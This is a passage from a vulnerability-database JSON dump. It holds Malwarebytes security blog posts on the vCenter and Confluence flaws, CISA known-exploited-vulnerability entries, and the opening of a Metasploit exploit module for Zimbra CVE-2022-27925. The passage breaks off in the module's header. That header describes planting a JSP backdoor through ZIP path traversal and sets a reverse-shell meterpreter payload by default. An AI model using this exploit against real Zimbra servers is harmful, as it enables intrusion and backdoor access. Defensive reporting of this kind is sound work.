now](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/>)\u201d, VMWare expects CVE-2021-22005 exploitation within minutes of disclosure\n * [Patch now](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-insecure-hikvision-security-cameras-can-be-taken-over-remotely/>)! Insecure Hikvision security cameras can be taken over remotely\n * MSHTML [attack targets Russian state rocket centre](<https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/>) and interior ministry\n * Italian mafia cybercrime sting leads to [100+ arrests](<https://blog.malwarebytes.com/scams/2021/09/italian-mafia-cybercrime-sting-leads-to-100-arrests/>)\n * How to [clear your cache](<https://blog.malwarebytes.com/101/how-tos/2021/09/how-to-clear-your-cache/>)\n * Microsoft exchange autodiscover flaw [reveals users\u2019 passwords](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/microsoft-exchange-autodiscover-flaw-reveals-users-passwords/>)\n * Parents and teachers believe digital surveillance of kids [outweighs risks](<https://blog.malwarebytes.com/privacy-2/2021/09/parents-and-teachers-believe-digital-surveillance-of-kids-outweighs-risks/>)\n * SonicWall warns users to [patch critical vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/sonicwall-warns-users-to-patch-critical-vulnerability-as-soon-as-possible/>) \u201cas soon as possible\u201d\n * Beware! Uber scam [lures victims](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/beware-uber-scam-lures-victims-with-alert-from-a-real-uber-number/>) with alert from a real Uber number\n * Teaching [cybersecurity skills to special needs children](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/teaching-cybersecurity-skills-to-special-needs-children-with-alana-robinson-lock-and-code-s02e18/>) with Alana Robinson: Lock and Code S02E18\n\n### Other cybersecurity news\n\n * UK ministry of defence [apologises](<https://www.theregister.com/2021/09/23/afghan_email_fail_ministry_defence/>) - again - after another major email blunder in Afghanistan (Source: The Register)\n * Database containing personal info of 106 million international visitors to Thailand [exposed](<https://www.comparitech.com/blog/information-security/thai-traveler-data-leak/>) online (Source: Comparitech)\n * Fake WhatsApp backup message [delivers malware](<https://portswigger.net/daily-swig/fake-whatsapp-backup-message-delivers-malware-to-spanish-speakers-devices>) to Spanish speakers\u2019 devices (Source: The Daily Swig) \nMobile phones of 5 French cabinet ministers [infected by Pegasus malware](<https://www.france24.com/en/europe/20210924-mobile-phones-of-five-french-cabinet-ministers-infected-by-pegasus-malware>) (Source: France 24)\n * Ransomware dropping malware swaps phishing for [sneaky new attack route](<https://www.zdnet.com/article/this-ransomware-dropping-malware-has-swapped-phishing-for-a-sneaky-new-attack-route/>) (Source: ZDNet)\n * Phishing attacks more sophisticated, malicious emails [time to coincide](<https://www.cpomagazine.com/cyber-security/phishing-attacks-more-sophisticated-malicious-emails-timed-to-coincide-with-periods-of-low-energy-and-inattentiveness/>) with periods of low energy and inattentiveness (Source: CPO magazine)\n * Keeping your data [secure at work](<https://minutehack.com/news/keeping-your-data-secure-at-work>) (Source: Minute Hack)\n\nStay safe, everyone!\n\nThe post [A week in security (Sept 20 \u2013 Sept 26)](<https://blog.malwarebytes.com/a-week-in-security/2021/09/a-week-in-security-sept-20-sept-26-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-27T11:01:42", "type": "malwarebytes", "title": "A week in security (Sept 20 \u2013 Sept 26)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-27T11:01:42", "id": "MALWAREBYTES:F776F8D86D7BD9350BDC23F1E51B31BF", "href": "https://blog.malwarebytes.com/a-week-in-security/2021/09/a-week-in-security-sept-20-sept-26-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T20:35:11", "description": "VMware is urging users of vCenter server to patch no fewer than [19 problems](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) affecting its products. \n\nThese updates fix a variety of security vulnerabilities, but and one of them is particularly nasty. That would be [CVE-2021-22005](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22005>), a critical file upload vulnerability with a CVSS score of 9.8 out of 10.\n\nIt's so bad the company is advising users to **sort it out "[right now](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>)"**:\n\n> These updates fix a critical security vulnerability, and your response needs to be considered at once. Organizations that practice change management using the ITIL definitions of change types would consider this an \u201cemergency change.\u201d\n\n### CVE-2021-22005\n\nvServer Center is a way to [manage large infrastructure](<https://geek-university.com/vmware-esxi/what-is-vcenter-server/>). If you have lots of hosts and virtual machines, this is a very good way to manage every aspect of your setup. With this in mind, if someone manages to compromise your vCenter, it probably won't end well.\n\nAnd that's exactly what CVE-2021-22005 does. It's a file upload vulnerability and anyone with access to vServer Center over a network can exploit it. The configuration settings of vServer Center don't make any difference. If criminals get network access they can upload a specially made file and use it to execute code on the vServer Center.\n\nAs VMware points out, bad actors are often already in your network. They wait patiently to strike. It's likely they'll exfiltrate data slowly and nobody will ever know they're there. Being able to snag a win like this for themselves could increase the threat from ransomware and other malicious activity.\n\n### What should I do?\n\nWell, patch immediately is definitely the [go-to advice](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>). If an emergency patch falls outside how you usually do things, VMware mentions, but it really does impress upon readers that patching needs to be done as soon as possible. It is, perhaps, unusual (and refreshing) to see an organisation stress this fact so plainly, so kudos for being so forthright.\n\n### Is my vServer setup affected by this?\n\nIt depends. Some versions, such as vCenter Server 6.5, are not affected. Others are. You should refer to the [dedicated rundown on](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>) this issue and take appropriate action as soon as you possibly can. We'll leave the last word to VMware with regard to when you should be patching:\n\n> Immediately, the ramifications of this vulnerability are serious and it is a matter of time \u2013 likely minutes after the disclosure \u2013 before working exploits are publicly available.\n> \n> With the threat of ransomware looming nowadays the safest stance is to assume that an attacker may already have control of a desktop and a user account through the use of techniques like phishing or spearphishing, and act accordingly. This means the attacker may already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence.\n\nThis seems like very good advice.\n\nThe post [Patch vCenter Server "right now", VMWare expects CVE-2021-22005 exploitation within minutes of disclosure](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-22T11:27:11", "type": "malwarebytes", "title": "Patch vCenter Server \u201cright now\u201d, VMWare expects CVE-2021-22005 exploitation within minutes of disclosure", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-22T11:27:11", "id": "MALWAREBYTES:8791EE404FCD2E2A063F220E6486B422", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-03T21:56:15", "description": "[Researchers](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>) found a vulnerability in Atlassian Confluence by conducting an incident response investigation. Atlassian rates the severity level of this vulnerability as critical.\n\nAtlassian has issued a [security advisory ](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>)and is working on a fix for the affected products. This qualifies the vulnerability as an actively exploited in the wild zero-day vulnerability.\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). This vulnerability is listed as [CVE-2022-26134](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26134>).\n\n## Confluence\n\nAtlassian Confluence is a collaboration tool in wiki style. Confluence is a team collaboration platform that connects teams with the content, knowledge, and their co-workers, which helps them find all the relevant information in one place. Teams use it to work together on projects and share knowledge.\n\nConfluence Server is the on-premises version which is being phased out. Confluence Data Center is the self-managed enterprise edition of Confluence.\n\n## The vulnerability\n\nThe description of CVE-2022-26134 says it is a critical unauthenticated remote code execution vulnerability in Confluence Server and Confluence Data Center.\n\nDuring the investigation, the researchers found JSP web shells written to disk. JSP (Jakarta Server Pages or Java Server Pages) is a server-side programming technology that helps software developers create dynamically generated web pages based on HTML, XML, SOAP, or other document types. JSP is similar to PHP and ASP, but uses the Java programming language.\n\nIt became clear that the server compromise stemmed from an attacker launching an exploit to achieve remote code execution. The researchers were able to recreate that exploit and identify a zero-day vulnerability impacting fully up-to-date versions of Confluence Server.\n\nAfter the researchers contacted Atlassian, Atlassian confirmed the vulnerability and subsequently assigned the issue to CVE-2022-26134. It confirmed the vulnerability works on current versions of Confluence Server and Data Center.\n\n## The attack\n\nThe researchers at Volexity were unwilling to provide any details about the attack method since there is no patch available for this vulnerability. However, they were able to provide some details about the shells that were dropped by exploiting the vulnerability.\n\nA web shell is a a malicious script used by an attacker that allows them to escalate and maintain persistent access on an already compromised web application. (Not every web shell is malicious, but the non-malicious ones are not interesting to us in this context.)\n\nThis web shell was identified as the China Chopper web shell. The China Chopper web shell is commonly used by malicious Chinese actors, including advanced persistent threat (APT) groups, to remotely control web servers. The web shell has two parts, the client interface and the small (4 kilobytes in size) receiver host file on the compromised web server. But access logs seemed to indicate that the China Chopper web only served as a means of secondary access.\n\nOn further investigation they found bash shells being launched by the Confluence web application process. This stood out because it had spawned a bash process which spawned a Python process that in turn spawned a bash shell. Bash is the default shell for many Linux distros and is short for the GNU Bourne-Again Shell.\n\nResearch showed that the web server process as well as the child processes created by the exploit were all running as root (with full privileges) user and group. These types of vulnerabilities are dangerous, as it allows attackers to execute commands and gain full control of a vulnerable system. They can even do this without valid credentials as long as it is possible to make web requests to the Confluence system.\n\nAfter successfully exploiting the Confluence Server systems, the attacker immediately deployed an in-memory copy of the BEHINDER implant. BEHINDER provides very powerful capabilities to attackers, including memory-only web shells and built-in support for interaction with [Meterpreter](<https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/>) and [Cobalt Strike](<https://blog.malwarebytes.com/glossary/cobalt-strike/>).\n\n## Mitigation\n\nThere are currently no fixed versions of Confluence Server and Data Center available. In the interim, users should work with their security team to consider the best course of action. Options to consider include:\n\n * Restricting access to Confluence Server and Data Center instances from the internet.\n * Disabling Confluence Server and Data Center instances.\n * If you are unable to take the above actions, implementing a WAF (Web Application Firewall) rule which blocks URLs containing **${** may reduce your risk.\n\n_Note: **${** is the first part of a parameter substitution in a shell script_\n\n## Affected versions\n\nAll supported versions of Confluence Server and Data Center are affected. And according to Atlassian it\u2019s likely that **all** versions of Confluence Server and Data Center are affected, but they are still investigating and have yet to confirm the earliest affected version.\n\nOne important exception: if you access your Confluence site via an atlassian.net domain. This means it is hosted by Atlassian and is not vulnerable.\n\nWe will keep you posted about the developments, so stay tuned.\n\n## Update June 3, 2022\n\nAtlassian has released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1 which contain a fix for this issue.\n\n**What You Need to Do**\n\nAtlassian recommends that you upgrade to the latest Long Term Support release. For a full description of the latest version, see the [Confluence Server and Data Center Release Notes](<https://confluence.atlassian.com/doc/confluence-release-notes-327.html>). You can download the latest version from the [download centre](<https://www.atlassian.com/software/confluence/download-archives>).\n\nThe post [[updated]Unpatched Atlassian Confluence vulnerability is actively exploited](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-06-03T14:41:58", "type": "malwarebytes", "title": "[updated]Unpatched Atlassian Confluence vulnerability is actively exploited", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-03T14:41:58", "id": "MALWAREBYTES:CA300551E02DA3FFA4255FBA0359A555", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited/", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa_kev": [{"lastseen": "2023-06-03T15:24:43", "description": "Zimbra Collaboration (ZCS) contains flaw in the mboximport functionality, allowing an authenticated attacker to upload arbitrary files to perform remote code execution. This vulnerability was chained with CVE-2022-37042 which allows for unauthenticated remote code execution.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-11T00:00:00", "type": "cisa_kev", "title": "Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-11T00:00:00", "id": "CISA-KEV-CVE-2022-27925", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:24:43", "description": "Zimbra Collaboration (ZCS) contains an authentication bypass vulnerability in MailboxImportServlet. This vulnerability was chained with CVE-2022-27925 which allows for unauthenticated remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-11T00:00:00", "type": "cisa_kev", "title": "Zimbra Collaboration (ZCS) Authentication Bypass Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-11T00:00:00", "id": "CISA-KEV-CVE-2022-37042", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:24:43", "description": "The Service Appliance component in Mitel MiVoice Connect allows remote code execution due to incorrect data validation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-27T00:00:00", "type": "cisa_kev", "title": "Mitel MiVoice Connect Data Validation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-29499"], "modified": "2022-06-27T00:00:00", "id": "CISA-KEV-CVE-2022-29499", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-06T15:41:25", "description": "Atlassian Questions For Confluence App has hard-coded credentials, exposing the username and password in plaintext. A remote unauthenticated attacker can use these credentials to log into Confluence and access all content accessible to users in the confluence-users group.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-29T00:00:00", "type": "cisa_kev", "title": "Atlassian Questions For Confluence App Hard-coded Credentials Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26138"], "modified": "2022-07-29T00:00:00", "id": "CISA-KEV-CVE-2022-26138", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-03T15:24:43", "description": "Zimbra Collaboration (ZCS) allows an attacker to inject memcache commands into a targeted instance which causes an overwrite of arbitrary cached entries.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-04T00:00:00", "type": "cisa_kev", "title": "Zimbra Collaboration (ZCS) Command Injection Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27924"], "modified": "2022-08-04T00:00:00", "id": "CISA-KEV-CVE-2022-27924", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-03T15:24:43", "description": "RARLAB UnRAR on Linux and UNIX contains a directory traversal vulnerability, allowing an attacker to write to files during an extract (unpack) operation.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-08-09T00:00:00", "type": "cisa_kev", "title": "RARLAB UnRAR Directory Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30333"], "modified": "2022-08-09T00:00:00", "id": "CISA-KEV-CVE-2022-30333", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-03T15:24:43", "description": "Multiple API endpoints of Atlassian Bitbucket Server and Data Center contain a command injection vulnerability where an attacker with access to a public Bitbucket repository, or with read permissions to a private one, can execute code by sending a malicious HTTP request.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-30T00:00:00", "type": "cisa_kev", "title": "Atlassian Bitbucket Server and Data Center Command Injection Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-36804"], "modified": "2022-09-30T00:00:00", "id": "CISA-KEV-CVE-2022-36804", "href": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:17:54", "description": "VMware vCenter Server contains a file upload vulnerability in the Analytics service that allows a user with network access to port 443 to execute code.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "VMware vCenter Server File Upload Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-22005", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T15:17:54", "description": "VMware vCenter Server vSphere Client contains a remote code execution vulnerability in a vCenter Server plugin which allows an attacker with network access to port 443 to execute commands with unrestricted privileges on the underlying operating system.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "VMware vCenter Server Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21972"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-21972", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2022-08-24T13:30:03", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-24T00:00:00", "type": "packetstorm", "title": "Zimbra Zip Path Traversal", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-27925", "CVE-2022-37042"], "modified": "2022-08-24T00:00:00", "id": "PACKETSTORM:168146", "href": "https://packetstormsecurity.com/files/168146/Zimbra-Zip-Path-Traversal.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'rex/zip' \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Zip Path Traversal in Zimbra (mboximport) (CVE-2022-27925)', \n'Description' => %q{ \nThis module POSTs a ZIP file containing path traversal characters to \nthe administrator interface for Zimbra Collaboration Suite. If \nsuccessful, it plants a JSP-based backdoor within the web directory, then \nexecutes it. \n \nThe core vulnerability is a path-traversal issue in Zimbra Collaboration Suite's \nZIP implementation that can result in the extraction of an arbitrary file \nto an arbitrary location on the host. \n \nThis issue is exploitable on the following versions of Zimbra: \n \n* Zimbra Collaboration Suite Network Edition 9.0.0 Patch 23 (and earlier) \n* Zimbra Collaboration Suite Network Edition 8.8.15 Patch 30 (and earlier) \n \nNote that the Open Source Edition is not affected. \n}, \n'Author' => [ \n'Volexity Threat Research', # Initial writeup \n\"Yang_99's Nest\", # PoC \n'Ron Bowes', # Analysis / module \n], \n'License' => MSF_LICENSE, \n'References' => [ \n['CVE', '2022-27925'], \n['CVE', '2022-37042'], \n['URL', 'https://blog.zimbra.com/2022/03/new-zimbra-patches-9-0-0-patch-24-and-8-8-15-patch-31/'], \n['URL', 'https://www.cisa.gov/uscert/ncas/alerts/aa22-228a'], \n['URL', 'https://www.yang99.top/index.php/archives/82/'], \n['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/9.0.0/P24'], \n['URL', 'https://wiki.zimbra.com/wiki/Zimbra_Releases/8.8.15/P31'], \n], \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Targets' => [ \n[ 'Zimbra Collaboration Suite', {} ] \n], \n'DefaultOptions' => { \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', \n'TARGET_PATH' => 